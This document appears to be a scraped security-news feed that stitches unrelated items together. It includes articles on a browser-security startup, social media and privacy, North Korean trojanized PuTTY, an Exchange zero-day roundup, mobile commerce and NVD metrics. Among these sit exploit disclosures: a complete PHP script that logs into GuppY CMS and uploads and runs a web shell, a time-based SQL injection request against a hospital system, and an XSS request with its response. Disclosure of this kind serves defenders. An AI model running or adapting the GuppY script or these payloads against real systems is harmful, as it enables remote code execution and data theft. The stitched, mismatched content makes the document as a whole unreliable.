By Waqas
With the increasing use of the internet, browser security has become an important issue. Malware, phishing, and adware…
This is a post from HackRead.com Read the original post: Meet Plexus, An AI-based Browser Security Solution from LayerX

With the increasing use of the internet, browser security has become an important issue. Malware, phishing, and adware are all dangers that can be encountered when browsing the web.

When a browser gets hacked, it can have serious consequences for users and businesses alike. Hackers can gain access to personal information, such as passwords and credit card numbers. They can also use the browser to spread malware or viruses. In some cases, hackers can even take control of the user’s computer.

To tackle the growing issue of browser security and vulnerability, Tel Aviv-based cybersecurity startup LayerX has unveiled the “Plexus” engine, a “user-first” extension-based universal browser security solution aiming at transforming any type of browser into a highly secure working environment without impacting users’ browsing experience.

The company also closed a $7.5 million Seed round with the following investors: Glilot Capital Partners, KMehin Ventures (the leading Israeli CISO syndicate), Mastercard FinSec Innovation Lab, Enel X, Int3, GuideStar, and cybersecurity angel investors.

Launched in 2021, LayerX uses AI-based, high-resolution monitoring to mitigate cybersecurity threats including those against web browsers. These include Google’s very own Chrome browser and Apple’s Safari browser, among others.

What makes Plexus a treat is LayerX’s deployment of a dual AI engine that works on both the client side and the backend, LayerX boosts enterprises’ protection against a wide range of browser-based security threats.

“Chrome and Safari aren’t the problem. Web browsers are perfectly built for productivity and security; it’s the interaction of the users over the web browsers that pose a threat to the organization,” notes Or Eshed, CEO and co-founder of LayerX.

“Our technology focuses on deep session analysis, adding that pivotal extra layer of security needed to keep browsers truly safe. Our solution fits into any organization and network, offering more security using fewer resources,” Eshed added.

Since Layer-X has opted for an extension-based approach, the security solution will be available on all popular browsers, including Chrome, Firefox, Safari, Opera, etc.

According to the former Chief Security Architect at Walmart Ira Winkler, “LayerX chose the approach that seems to make the most sense for browser security. An extension-based approach significantly reduces the technical risk of compatibility across all platforms and the complexity and cost of rollout and maintenance. It also reduces operational risks associated with third parties, diverse equipment, and countless other issues when compared to proprietary browser solutions.”

In conclusion, the “Plexus” engine can be a promising new solution to the growing issue of browser cybersecurity. With its user-first approach and extension-based design, it has the potential to make a significant impact on the way we browse the web securely.

1.  Guardio Review: Browser Extension Against Cybercrime?
2.  Brave Browser enters the dark web with Tor Onion service
3.  Download official version of Tor browser on Android devices
4.  Meet DuckDuckGo’s robust privacy-focused desktop browser
5.  How to automatically accept or disable browser cookies notice

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Meet Plexus, An AI-based Browser Security Solution from LayerX

Constantly posting content on social media can erode your privacy—and sense of self.

To be online is to be constantly exposed. While it may seem normal, it’s a level of exposure we’ve never dealt with before as human beings. We’re posting on Twitter, and people we’ve never met are responding with their thoughts and criticisms. People are looking at your latest Instagram selfie. They’re literally swiping on your face. Messages are piling up. It can sometimes feel like the whole world has its eyes on you.

Being observed by so many people appears to have significant psychological effects. There are, of course, good things about this ability to connect with others. It was crucial during the height of the pandemic when we couldn’t be close to our loved ones, for example. However, experts say there are also numerous downsides, and these may be more complex and persistent than we realize.

Studies have found that high levels of social media use are connected with an increased risk of symptoms of anxiety and depression. There appears to be substantial evidence connecting people’s mental health and their online habits. Furthermore, many psychologists believe people may be dealing with psychological effects that are pervasive but not always obvious.

“What we’re finding is people are spending way more time on screens than previously reported or than they believe they are,” says Larry Rosen, professor emeritus of psychology at California State University, Dominguez Hills. “It’s become somewhat of an epidemic.”

Rosen has been studying the psychological effects of technology since 1984, and he says he’s watched things “spiral out of control.” He says people are receiving dozens of notifications every day and that they often feel they can’t escape their online lives.

“Even when you’re not on the screens, the screens are in your head,” Rosen says.

One value of privacy is that it gives us space to operate without judgment. When we’re using social media, there are often a lot of strangers viewing our content, liking it, commenting on it, and sharing it with their own communities. Any time we post something online, thus exposing a part of who we are, we don’t fully know how we’re being received in the virtual world. Fallon Goodman, an assistant professor of psychology at George Washington University, says not knowing what kind of impression you’re making online can cause stress and anxiety.

“When you post a picture, the only real data you get are people’s likes and comments. That’s not necessarily a true indication of what the world feels about your picture or your post,” Goodman says. “Now you’ve put yourself out there—in a semi-permanent way—and you have limited information about how that was received, so you have limited information about the evaluations people are making about you.”

Anna Lembke, a professor of psychiatric and behavioral sciences at Stanford University, says we construct our identities through how we’re seen by others. Much of that identity is now formed on the internet, and that can be difficult to grapple with.

“This virtual identity is a composition of all of these online interactions that we have. It is a very vulnerable identity because it exists in cyberspace. In a weird kind of way we don’t have control over it,” Lembke says. “We’re very exposed.”

Without the ability to find out how their identity is ricocheting around the virtual world, people often feel a fight-or-flight response when they’ve been online for many hours—and even after they’ve logged off.

“It’s kind of an adapted hyper-vigilance. As soon as you send something out into the virtual world, you’re sort of sitting on pins and needles waiting for a response,” Lembke says. “That alone—that kind of expectancy—is a state of hyperarousal. How will people respond to this? When will they respond? What will they say?”

It would be one thing if only you saw any negative reactions, Lembke says, but they’re often available for everyone to see. She says this exacerbates feelings of shame and self-loathing that are already “endemic” in the modern world.

We are social creatures, and our brains evolved to form communities, communicate with each other, and work together. We have not evolved to expose ourselves to the judgment of the whole world on a daily basis. These things affect everyone differently, but it’s clear many people regularly feel overwhelmed by this exposure level.

If we’re not careful, our online lives can become a source of chronic stress that subtly seeps into everything. Everyone needs some privacy, but we often don’t provide it for ourselves and end up feeling like we’re constantly battling invisible enemies.

There are things you can do for yourself, however. You can turn off your notifications for social media apps, reduce how much time you spend on them, limit when you allow yourself to use them, and more. Goodman says it sometimes helps to keep your phone in the other room so you’re not so easily tempted to pick it up.

Lembke says we need to change how we think about social media and internet use as a society. She calls it a “collective” problem, not just an individual one.

“We need to come up with a kind of cultural etiquette around what appropriate and healthy consumption is, just like we have for other consumptive problems,” Lembke says. “We have nonsmoking areas. We don’t eat ice cream for breakfast. We have all kinds of laws around who can buy and consume alcohol, who can go into a casino. We need guardrails for these digital products, especially for minors.”

The High Cost of Living Your Life Online

By Waqas
The hacker group is called ZINC, and its primary targets are organizations in the aerospace, media, IT services, and defense sectors.
This is a post from HackRead.com Read the original post: NK Hackers Lacing Legit Software with Malware

Microsoft threat hunters discovered a new phishing campaign launched by a North Korean government-backed hacking group involving the use of weaponized open-source software. The malware is laced with extensive capabilities, including data theft, spying, network disruption, and financial gains.

**Well-known Software Used in Phishing Campaign**

In the new campaign, hackers are weaponizing famous open-source software, and their primary targets are organizations in the aerospace, media, IT services, and defense sectors.

In its report published on Thursday, Microsoft stated that the hackers are a sub-division of the notorious Lazarus hacking group called ZINC. This group has injected encrypted code in several open-source apps, including KiTTY, Sumatra PDF Reader, PuTTY, and muPDF/Subliminal Recording software installers, eventually leading to espionage malware being installed as ZetaNile.

For your information, ZINC is the same group that successfully conducted the highly destructive Sony Pictures Entertainment compromise in 2014.

**LinkedIn Abused to Lure Targets**

The researchers have referred to the attackers as highly dangerous, operational, and sophisticated nation-state actors abusing the LinkedIn networking portal to hunt for targets. The crooks use the network to connect and befriend employees of their selected organizations. Their targets are based in India, Russia, the UK, and the USA.

The campaign started in June 2022, whereby ZINC used conventional social engineering tactics to search and connect with individuals and gain their trust before switching the conversation to WhatsApp. Once this is achieved, they deliver the malicious payloads.

LinkedIn’s threat prevention and defense team confirmed detecting fake profiles created by North Korean actors impersonating recruiters working at prominent media, defense, and tech firms. They want to lure targets away from LinkedIn and move them to WhatsApp.

It is worth noting that LinkedIn is owned by Microsoft Corporation since 2016.

One of the fraudulent recruiter profiles on Linkedin used in the campaign (Image: Microsoft)

**Attach Methodology Explained**

According to a joint blog post by Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense, the trojanized KiTTY and PuTTY apps use an intelligent tactic to ensure that only selected targets are infected with malware and not others.

To achieve this, the app installers don’t execute malicious code. The malware is installed only when the apps connect to a particular IP address and use login credentials given to the targets by fake recruiters.

The threat actors also use DLL search order hijacking to load and decrypt a second-stage payload when this key 0CE1241A44557AA438F27BC6D4ACA246 is presented for command and control.

Additional malware is installed when the connection is established with the C2 server. Both apps work in the same manner. Similarly, TightVNC Viewer installs the final payload after the user selects ec2-aet-tech.w-adaamazonaws from a dropdown menu of remote hosts in the app.

Microsoft is urging the cybersecurity community to pay attention to this threat, given its extensive usage and use of legit software products. Moreover, it threatens users and organizations across multiple regions and sectors.

**More NK Hackers News**

1.  North Korean Hackers Posing as IT Workers
2.  How Bad is the North Korean Cyber Threat?
3.  NK hackers stole $1.7B from crypto exchanges
4.  Lazarus using AppleJeus MacOS malware for crypto
5.  LAZARUS Using TraderTraitor Malware to Target Blockchain

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

NK Hackers Lacing Legit Software with Malware

GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

GuppY CMS 6.00.10 Shell Upload

Plus: CIA failures allegedly got US informants killed, a former NSA worker is charged under the Espionage Act, and more.

There were global ripples in tech policy this week as VPN providers were forced to pull out of India as the country’s new data collection law takes hold, and UN countries prepare to elect a new head of the International Telecommunications Union—a key internet standards body.

After explosions and damage to the Nord Stream gas pipeline that runs between Russia and Germany, the destruction is being investigated as deliberate, and a complicated hunt is on to identify the perpetrator. And still-unidentified hackers are “hyperjacking” victims to grab data using a long-feared technique for hijacking virtualization software.

The notorious Lapsus$ hackers have been back on their hacking joyride, compromising massive companies around the world and delivering a dire but important warning about how vulnerable large institutions really are to compromise. And the end-to-end-encrypted communication protocol Matrix patched serious and concerning vulnerabilities this week.

Pornhub debuted a trial of an automated tool that pushes users searching for child sexual abuse material to seek help for their behavior. And Cloudflare rolled out a free Captcha alternative in an attempt to validate humanness online without the headache of finding bicycles in a grid or deciphering blurry text.

We’ve got advice on how to stand up to Big Tech and advocate for data privacy and users' rights in your community, plus tips on the latest iOS, Chrome, and HP updates you need to install.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

On Thursday night, Microsoft confirmed that two unpatched Exchange Server vulnerabilities are actively being exploited by cybercriminals. The vulnerabilities were discovered by a Vietnamese cybersecurity company named GTSC, which claims in a post on its website that the two zero-days have been used in attacks against its customers since early August. While the flaws only impact on-premise Exchange Servers that an attacker has authenticated access to, according to GTSC, the zero-days can be chained together to create backdoors into the vulnerable server. “The vulnerability turns out to be so critical that it allows the attacker to do RCE \[remote code execution\] on the compromised system,” the researchers said.

In a blog post, Microsoft described the first flaw as a server-side request forgery (SSRF) vulnerability, and the second as “an attack that allows remote code execution on a vulnerable server when PowerShell is accessible to the attacker.” The post also provides guidance for how on-premises Microsoft Exchange customers should mitigate the attack.

Sloppy dev-ops and CIA negligence partially enabled Iranian intelligence to identify and capture informants who risked their lives to provide the United States with information, according Reuters. The year-long investigation follows the story of six Iranian men who were jailed as part of an aggressive counterintelligence operation by Iran that began in 2009. The men were partially outed by what Reuters describes as a flawed web-based covert communications system that led to the arrest and execution of dozens of CIA informants in Iran and China. In 2018, Yahoo News reported on the system.

Because the CIA appeared to have purchased web-hosting space in bulk from the same provider, Reuters was able to enumerate hundreds of secret CIA websites meant to facilitate communications between informants around the world and their CIA handlers. The sites, which are no longer active, were devoted to topics such as beauty, fitness, and entertainment. Among them, according to Reuters, was a _Star Wars_ fan page. Two former CIA officials told the news agency that each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured.

James Olson, a former chief of CIA counterintelligence, told Reuters, “If we’re careless, if we’re reckless, and we’ve been penetrated, then shame on us.”

On Wednesday, a former National Security Agency staffer was charged with three violations of the Espionage Act for allegedly attempting to sell classified national defense information to an unnamed foreign government, according to court documents unsealed this week. In a press release about the arrest, the US Department of Justice stated that Jareh Sebastian Dalke, of Colorado Springs, Colorado, used an encrypted email to send excerpts of three classified documents to an undercover FBI agent, who he believed to be working with a foreign government. Dalke allegedly told the agent that he was in serious financial debt and, in exchange for the information, needed compensation in cryptocurrency.

The FBI arrested Dalke on Wednesday when he arrived at Union Station in downtown Denver to deliver classified documents to the undercover agent. If convicted, he could face up to life in prison or the death penalty.

On Tuesday, hackers hijacked _Fast Company_’s content management system, blasting two obscene push notifications to the publication’s Apple News followers. In response, the publication’s parent company, Mansueto Ventures, shut down Fastcompany.com and Inc.com, which it also owns. _Fast Company_ issued a statement calling the messages “vile” and “not in line with the content and ethos” of the outlet. An article the hacker apparently posted to _Fast Company_’s website claimed they got access through a password that was shared across many accounts, including an administrator.

As of yesterday, the company’s websites were still offline, instead redirecting to a statement about the hack.

Microsoft Exchange Server Has a Zero-Day Problem

By Owais Sultan
Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need…
This is a post from HackRead.com Read the original post: Top 5 Mobile Commerce Trends in 2022

Due to its many benefits, mobile commerce has been growing quickly over the last several years. The need for mobile app development and mobile commerce is growing daily. Mobile commerce may provide you with many options to succeed in the internet market if you are an online vendor.

However, there are currently a number of significant m-commerce competitors on the market, so it’s important to remain up to date on these developments if you want to stay ahead of the pack.

**What Exactly is M-commerce?**

Mobile commerce is the act of buying and selling products and services using portable electronics like smartphones and tablets. Mobile devices with shopping applications, social media channels, and online browsers are used for all commercial transactions.

Ecommerce development solely pertains to smartphones and tablets, to put it more precisely. It is simpler for a user to do mobile shopping thanks to the speed, ease, and creative route of a mobile application.

Additionally, by offering customers the greatest e-commerce app development services, mobile e-commerce apps or websites allow them access. Additionally, it enables consumers to shop and explore from anywhere.

**Trends in Mcommerce That are Effective for Interacting with Mobile Users**

**Using Mobile Applications to Shop**

According to Google, over the last two years, digital innovation in the retail industry has grown quickly, with the percentage of channel-agnostic shoppers rising from 65% to 73%. Lockdown limitations implemented globally have resulted in a 20% increase in time spent within mobile applications for retail apps. Many businesses then relocated the services their applications provided.

In this technologically evolved world, mobile apps are becoming a far more major part of the channel mix for retailers, so it’s important to understand how they may help you serve your customers in new ways and expand your company. especially at a time of social distance and unpredictability.

**Cryptocurrency Payments**

In 2024, it is anticipated that the cryptocurrency market would be worth $1.40 billion. Instantaneous digital payments are simplified and extremely secure because of crypto’s enhancements to portability and interoperability with QR codes.

With the help of cryptocurrency payments, firms can easily accept numerous currencies on mobile retail applications throughout the globe in a safe, personalized wallet. When making purchases through a mobile retail app, customers use rapid, secure mobile wallets like Apple Pay or Android Pay.

**High Mobile Phone Sales Volumes**

In 2022, smartphones and mobile shopping will unquestionably rule the eCommerce industry. Not all surfing is done on mobile websites and applications. Additionally, they are making purchases on their phones. A mobile app often generates sales worth $102 on average, compared to $92 for mobile websites.

iPads and tablets may also be used to access these applications and websites. However, starting in 2019, these gadgets’ sales have been declining. Depending on the device they are using, you may select how to communicate your marketing messaging to them. 

**Simple Ordering**

Numerous major firms are already working in this area to take advantage of the growing possibility in the m-commerce market as mobile commerce gains popularity. It is essential to provide your consumers with a better user experience and a smooth checkout procedure if you want to remain ahead of the competition.

Modern consumers want simple, fast methods of buying. Every time they wish to make a purchase, forcing your consumers to manually input all of their information may cause them to exit the basket. 

Shopping cart abandonment rates on mobile websites are higher because mobile applications often provide a better checkout experience than mobile websites.

**Virtual Reality and Augmented Reality**

Online consumers may digitally “try on” or “experience” the things they are interested in purchasing with the use of augmented reality, which is an excellent use of technology.

AR dramatically changes how you browse, and as a result, many businesses today, like IKEA, Gucci, and others, heavily rely on Augmented Reality (AR) technology to provide amusement and inspiration. The integration of online and offline shopping experiences is made possible by virtual reality, which improves the buying experience for the consumer.

**Conclusion**

For the foreseeable future, mobile trends will continue to greatly impact the e-commerce sector. You must maintain a close watch on mobile commerce developments as an owner of an e-commerce shop in order to make the necessary plans.

Making a mobile app for your e-commerce website is the simplest method to stay current with new technology and the times. In 2022, customers will choose to buy in this manner.

1.  How Traffic Analysis Boosts Ecommerce Profits
2.  How Technology Can Help Your Business Succeed
3.  Top Data-Driven Methods for Improving Your Investment Decisions
4.  Development of Corporate Applications Based on Artificial Intelligence
5.  Recent Mobile Payment Trends And How They Are Shaping The Future

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Top 5 Mobile Commerce Trends in 2022

Reports to the National Vulnerability Database jumped in 2022, but we should pay just as much attention to the flaws that are not being reported to NVD, including those affecting the software supply chain.

"You can't improve what you don't measure" is an oft-cited bit of wisdom frequently attributed to the famous management consultant Peter Drucker.

It's hard to dismiss the core truth of the saying, even if — for the record — he didn't say it, according to the Drucker Institute. After all, metrics from quarterly sales to individual KPIs are the basis for compensation, promotions, and more in 21st century organizations. There is also abundant evidence — from B.F. Skinner, for one — that humans quickly tailor their behaviors to how they're measured and incentivized.

The question that goes unasked is whether the right things are being measured, or whether the measurements in question are complete enough that they don't distort the perceptions (and decisions) of those doing the measuring. Those kinds of inconvenient questions informed research sponsored by ReversingLabs, the firm I co-founded, that analyzed six months of reports to the National Vulnerability Database (NVD) maintained by the National Institute of Standards and Technology (NIST).

**2022: A Banner Year for CVEs**

Our analysis found that vulnerability reports of new Common Vulnerabilities and Exposures (CVEs) to the NVD are accelerating, with 2022 on track to be the biggest year ever for new vulnerability reports. If the current trend holds, there will be more than 24,500 reports by year's end. That would mark a 22% increase over 2021, which was also a record-breaking year.

Those numbers seem to suggest that software security is deteriorating and that more forceful interventions by the public and private sector are needed to shore up software security. But there's a lot that's missed in that quick take. In its two decades of existence, the NVD has seen inconsistent growth in the number of reported vulnerabilities and exposures. Before 2005, the annual number of vulnerabilities assigned a CVE identifier never exceeded 2,500. For more than a decade after that, disclosed issues fluctuated between 4,000 and 8,000 reports per year.

The number of new CVEs in those years reflected the limited capacity of the CVE team at the nonprofit corporation MITRE, which was charged with taking in and documenting new CVE reports. We know that, because once MITRE began inviting more organizations to report vulnerabilities as CVE Number Authorities (CNAs) in 2016, the number of vulnerabilities surged. It doubled in 2017, and each year since has surpassed the previous year's record of reported CVEs.

The message: Considering a metric like the number of new CVEs is a mostly meaningless exercise if you're trying to assess the overall state of software security. More contributing firms will result in more CVEs. Fewer contributing firms will produce a drop in CVEs. The overall trend line is meaningless — at least so long as participation in the CVE program and submissions to the NVD by software vendors are voluntary.

**Software Supply Chain Security: Unmeasured and Unimproved**

As to the question of whether the right things are being measured? Here again, the current configuration of the NVD is misleading and heavily skewed toward the "usual suspects." Linux distributions Fedora and Debian accounted for 1,123 and 958 vulnerabilities, respectively, in the first half of 2022 and rank first and third on the list of software firms affected by reported issues, our research revealed. Google, Microsoft, Oracle, and Apple accounted for more than 500 vulnerabilities each.

The NVD has far less to say about flaws in popular open source platforms that are getting attention from sophisticated cyber actors. For example, our research shows that attacks on the popular software package repositories NPM and Python Package Index (PyPI) spiked 289% in the past few years, to 1,010 in 2021 from 259 in 2018. But only 56 CVEs referencing PyPI are in the NVD. PyPi's owner, the Python Software Foundation, is not a CNA. Other popular development and CI/CD platforms like CodeCov, CircleCI, and Bamboo are likewise not CNAs.

**Uncomfortable Question: Can We Trust Code?**

What does this disconnect mean for the future of public resources like the NVD? Change, for one thing. Recent events — such as the hijacking of the popular ua-parser-js project by a cryptominer — show that even seemingly secure projects can be compromised.

The lesson from incidents like this is that software security teams need to expand their focus beyond vulnerability scanning and even source code analysis to look at what code is doing. As long as we ignore this core question — can we trust code? — we are not addressing software supply chain security.

NIST and the federal government are also slowly pushing forward to implement the White House's year-old executive order on improving the nation's cybersecurity, which requires all federal government contractors and software providers to create a software bill of materials (SBOM) that can be reviewed. Recently released practice guidelines from the NSA, CISA, and ODNI further spell out steps organizations can take to secure software supply chains.

To keep pace with these larger changes, however, the NVD also needs to evolve. At the very least, its scope should expand to consistently include software supply chain exposures. Only then will the NVD move closer to representing the full breadth of threats facing modern organizations.

With the Software Supply Chain, You Can't Secure What You Don't Measure

hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

Tag

#apple